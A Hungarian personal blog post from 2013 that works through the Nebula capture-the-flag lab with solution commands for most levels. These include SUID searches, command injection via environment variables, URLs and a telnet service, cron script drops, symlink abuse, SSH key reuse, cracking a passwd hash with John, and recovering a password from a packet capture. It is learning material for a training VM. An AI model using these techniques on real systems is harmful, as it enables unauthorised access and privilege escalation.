2013. november 30., szombat

Privilégium eszkaláció

Első lépés feldertés.
Who am I?
id
Where am I?
pwd
What is in there?
ls -al
Which system is this?
uname -a
cat /etc/*release*

----

Forrás:

http://insidetrust.blogspot.hu/2011/04/quick-guide-to-linux-privilege.html

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

http://www.rebootuser.com/?p=1623

https://www.netspi.com/blog/entryid/112/windows-privilege-escalation-part-1-local-administrator-privileges

Automated checkers:

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://www.rebootuser.com/?p=1758

Feladványok:

http://exploit-exercises.com/nebula

level00

find / -perm -4000 -type f 2>/dev/null
/bin/.../flag00

level01

Itt nem egészen értettem, hogy mit kell csinálni így megnéztem egy megoldást - utána már egyszerűbb volt...

http://www.mattandreko.com/2011/12/02/exploit-exercises-nebula-01/

level02

cd /home/flag02
USER="a && /bin/bash && "
./flag02
geflag

level03

vi /home/level03/test
#!/bin/bash
getflag > /tmp/out

cp /home/level03/test writeable.d

... (wait 1 minute)
cat /tmp/out

level04

cd /home/flag04
ln -s /home/flag04/token /home/level04/t
./flag04 /home/level04/t
06508b5e-8909-4f38-b630-fdb148a848a2

level05

cd /home/flag05
ls -al
ls -al .backup
cp .backup/b* /home/level05
cd /home/level05
tar xvzf backup-19072011.tgz
ssh flag05@192.168.56.101 -i .ssh/id_rsa
getflag

level06

ls -al /home/flag06
grep flag06 /etc/passwd

edit a.pas
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

john a.pas
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 15687  trying: 123456 - marley

exit
nebula login:flag06
Password: hello
getflag

level07
cd /home/flag07
more thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101

PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.
64 bytes from 192.168.56.101: icmp_req=1 ttl=64 time=0.020 ms
64 bytes from 192.168.56.101: icmp_req=2 ttl=64 time=0.050 ms
64 bytes from 192.168.56.101: icmp_req=3 ttl=64 time=0.056 ms

--- 192.168.56.101 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.020/0.042/0.056/0.015 ms

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20ls%20-al

total 10
drwxr-x--- 2 flag07 level07  102 Nov 20  2011 .
drwxr-xr-x 1 root   root     260 Aug 27  2012 ..
-rw-r--r-- 1 flag07 flag07   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag07 flag07  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag07 flag07   675 May 18  2011 .profile
-rwxr-xr-x 1 root   root     368 Nov 20  2011 index.cgi
-rw-r--r-- 1 root   root    3719 Nov 20  2011 thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20id

uid=992(flag07) gid=992(flag07) groups=992(flag07)

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20getflag

You have successfully executed getflag on a target account

level08

cd /home/flag08
ls -al
cp capture.pcap /home/level08
cd /home/level08
scp capture.pcap user@192.168.56.102:.

wireshark capture.pcap

Follow Tcp stream

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b.....B.
..............................1.......!.."......"......!..........."........".."................
.....................

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)


..wwwbugs login: l.le.ev.ve.el.l8.8
..

Password: backdoor...00Rm8.ate
.

..

Login incorrect

wwwbugs login:



backdoor...00Rm8.ate

000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .

7f = delete

backd00Rmate

nebula login: flag08
Password: backd00Rmate

getflag

level09

Ez a feladat meghaladta a jelenlegi tudásomat :)

http://www.mattandreko.com/2011/12/10/exploit-exercises-nebula-09/

level10

ls -al
more .viminfo
strings x

Ez egy nehéz feladvány volt, de mivel két lépésben hozzájutottam a szükséges kódhoz nem fárasztottam vele magam (persze megnéztem, hogy mi a példa igazi megoldása, de végülis ha megy könnyebben, akkor nem vesződöm a nehezebb úttal.)

http://www.mattandreko.com/2011/12/11/exploit-exercises-nebula-10/

http://www.pedramhayati.com/2012/02/01/nebula-level10-solution/

level11

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level12

telnet 127.0.0.1 5001
| ls -al > /tmp/a

cat /tmp/a

telnet 127.0.0.1 5001
| getflag > /tmp/b

cat /tmp/b

level13

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level14

cd /home/flag14
cat token
./flag14
aaaaaaaaaaaaaaaaaaaa
abcdefghijklmnopqrst

vi /home/level14/decode.pl

#!/usr/bin/perl

while (my $line = <STDIN>) {
 chomp($line);
 $len = length($line);
 for ($i = 0; $i < $len; $i++) {
  $y = substr($line,$i,1);
  $x = ord($y);
  print chr($x-$i);
  }
 }

cat token | perl /home/level14/decode.pl
8457c118-887c-4e40-a5a6-33a25353165

level15-level19

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

Ezekbe most nem volt kedvem belemenni. Meg különben is meghaladták a jelenlegi felkészültségi szintemet.
Jöhetnek a Privilege Escalation feladványok..... Most egy kicsit beleásom ebbe a részbe magam.

Nincsenek megjegyzések:

Megjegyzés küldése

Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.